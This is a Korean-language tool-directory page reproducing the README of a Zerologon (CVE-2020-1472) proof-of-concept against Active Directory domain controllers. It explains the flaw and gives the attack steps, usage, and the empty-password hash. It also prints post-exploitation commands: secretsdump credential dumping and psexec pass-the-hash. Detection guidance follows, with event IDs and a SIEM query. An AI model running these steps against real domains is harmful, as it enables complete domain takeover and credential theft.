Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ZeroLogon-PoC-DC-Pwn — Zerologon (CVE-2020-1472) 개념 증명(PoC) 애플리케이션 - Active Directory의 치명적인 취약점 악용 도구. | Kitploit
도구/GitHubGitHub/mods20hh/zerologon-poc-dc-pwn
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationPost-ExploitationPenetration TestingPapers & ResearchLearning & EducationRed Teaming
GitHubmods20hh/zerologon-poc-dc-pwn

ZeroLogon-PoC-DC-Pwn

Zerologon (CVE-2020-1472) 개념 증명(PoC) 애플리케이션 - Active Directory의 치명적인 취약점 악용 도구.

4325일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

Zerologon (CVE-2020-1472)

개요

이 프로젝트는 가장 중요한 Active Directory 보안 취약점 중 하나인 **Zerologon 취약점(CVE-2020-1472)**의 구현입니다. 이 취약점은 인증되지 않은 공격자가 도메인 컨트롤러의 컴퓨터 계정 비밀번호를 재설정하여 전체 Active Directory 도메인을 손상시키는 것을 허용합니다.

CVSS 점수: 10.0 (치명적)

Zerologon이란 무엇인가?

Zerologon은 Microsoft의 Netlogon 원격 프로토콜(MS-NRPC)에 존재하는 암호화 결함입니다. 이 취약점은 Netlogon이 하드코딩된 0 값의 초기화 벡터(IV)와 함께 AES-CFB8 암호화를 사용하는 방식에 존재합니다.

기술 요약:

  • Netlogon 프로토콜은 challenge-response(도전-응답) 인증 메커니즘을 사용합니다.
  • 잘못된 암호화 구현으로 인해, 모두 0인 challenge는 1/256의 확률로 유효한 인증을 생성할 수 있습니다.
  • 공격자는 약 2000회의 인증 시도를 보내 이 결함을 안정적으로 악용할 수 있습니다.
  • 인증에 성공하면, 공격자는 도메인 컨트롤러의 컴퓨터 계정 비밀번호를 알려진 값(빈 해시)으로 재설정할 수 있습니다.

작동 원리

root@kitploit:~
1. Target Selection
   └─> Identify Domain Controller (FQDN, NetBIOS name, machine account)

2. Challenge Phase (I_NetServerReqChallenge)
   └─> Send all-zero client challenge (0x0000000000000000)
   └─> Receive server challenge

3. Authentication Phase (I_NetServerAuthenticate2)
   └─> Attempt authentication with null credentials
   └─> Repeat until successful (~1/256 success rate per attempt)

4. Password Reset Phase (I_NetServerPasswordSet2)
   └─> Reset DC machine account password to empty
   └─> New NT hash: 31d6cfe0d16ae931b73c59d7e0c089c0 (empty password)

5. Post-Exploitation
   └─> Use Pass-the-Hash with empty credentials
   └─> Full domain compromise achieved

프로젝트 빌드

사전 요구 사항

  • Windows 개발 환경 (Windows 10/11)
  • Visual Studio 2022
  • Windows SDK

컴파일

Visual Studio 사용:

root@kitploit:~
1. Open Visual Studio
2. Select **Build Solution** from the **Build** menu.

사용법

root@kitploit:~
Zerologon.exe <DC_FQDN> <DC_NetBIOS_Name> <Machine_Account_Name>

예시:

root@kitploit:~
Zerologon.exe DC01.corp.example.com DC01 DC01$

매개변수:

  • DC_FQDN: 대상 도메인 컨트롤러의 정규화된 도메인 이름(FQDN)
  • DC_NetBIOS_Name: DC의 NetBIOS 이름 (일반적으로 호스트 이름)
  • Machine_Account_Name: 컴퓨터 계정 이름 ($로 끝나야 함)

예상 출력:

성공적인 악용:

root@kitploit:~
[+] Targeting Domain Controller:
    FQDN           : DC01.corp.example.com
    NetBIOS Name   : DC01
    Machine Account: DC01$

[+] SUCCESS: Machine account password reset to empty!
[+] Now use Pass-the-Hash with:
      .\DC01$:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[+] Then run: secretsdump.py -just-dc <domain>/<dc_account>@<dc_ip>

실패한 악용 (패치된 시스템):

root@kitploit:~
[-] Attack failed after 2000 attempts. Target likely patched.

사후 악용

DC 비밀번호를 성공적으로 재설정한 후, 다음을 수행할 수 있습니다:

  1. 도메인 자격 증명 덤프:
root@kitploit:~
secretsdump.py -no-pass -just-dc 'DOMAIN/DC01$'@192.168.1.10
  1. Pass-the-Hash 인증:
root@kitploit:~
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC01$'@DC01

탐지

네트워크 기반 탐지:

  • 단일 소스에서 발생한 다수의 실패한 Netlogon 인증 시도
  • MS-NRPC 트래픽의 비정상 패턴
  • Zerologon 악용에 대한 IDS/IPS 시그니처

로그 기반 탐지:

root@kitploit:~
Event Viewer → Windows Logs → System
- Event ID 5827: Multiple password validation failures
- Event ID 5829: Secure channel reset

SIEM 쿼리:

root@kitploit:~
source="WinEventLog:System" EventCode=5827 OR EventCode=5829
| stats count by Computer, SourceIP
| where count > 100

면책 조항

이 도구는 교육 및 승인된 보안 연구 목적으로만 제공됩니다.

저자는 이 코드의 오용에 대해 어떠한 책임도 지지 않습니다.

참고 자료

공식 자료:

  • CVE-2020-1472 - NIST
  • Microsoft 보안 권고
  • Secura 연구 논문

기술 분석:

  • Microsoft Netlogon 프로토콜 사양
  • Zerologon 기술 심층 분석

도구:

  • Impacket Toolkit - 사후 악용용
  • Mimikatz - 자격 증명 추출

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.

도구 다운로드